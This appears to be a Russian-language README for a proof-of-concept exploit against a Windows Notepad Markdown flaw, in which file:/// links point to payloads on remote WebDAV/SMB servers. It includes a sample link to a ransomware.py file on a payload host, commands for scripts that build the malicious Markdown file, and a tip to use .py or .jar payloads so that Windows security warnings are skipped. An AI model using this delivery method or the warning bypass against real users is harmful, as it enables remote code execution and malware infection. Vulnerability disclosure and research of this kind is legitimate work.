
PoC для "Windows Notepad RCE"
PoC уязвимости "Windows Notepad RCE".
«Уязвимость» проста. Markdown-движок в Windows Notepad не обращает внимания на малоизвестные протоколы URL. Как аналитик вредоносного ПО, я читал множество отчётов о развёртывании полезной нагрузки через WebDAV и SMB. Из этого документа можно узнать, как злоупотребить протоколом file:/// и создать URL, указывающий на файл на WebDAV/SMB-сервере.
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)
Я сделал два скрипта. Один на Node.js, другой на Python. Оба создают markdown-файл, указывающий на WebDAV-полезную нагрузку. Вы можете использовать примеры полезной нагрузки из папки .
node poc.js <webdav-server> <port> <payload/path/on/server>
python poc.py <webdav-server> <port> <payload/path/on/server>
Вывод (poc.md) появится в текущем каталоге.
Большинство расширений файлов полезной нагрузки (например, .exe, .lnk, .vbs, ...) по-прежнему вызывают встроенное предупреждение, несмотря на уязвимость приложения Notepad. Предупреждение исходит от самой Windows. По крайней мере всё, что я тестировал и что может привести к выполнению кода в стандартной установке OOB, показывает это обязательное предупреждение.

Если на целевом устройстве установлены Python или Java, вы можете использовать полезную нагрузку .py или .jar, чтобы обойти всплывающее предупреждение.

Теперь при клике по ссылке появляется новое всплывающее предупреждение.
Уязвимую версию Windows Notepad можно найти на Uptodown. Не забудьте проверить цифровую подпись установщика и убедиться, что она принадлежит Microsoft. Кроме того, тестировать этот PoC следует только в виртуальной машине.
Будьте осторожны и получайте удовольствие!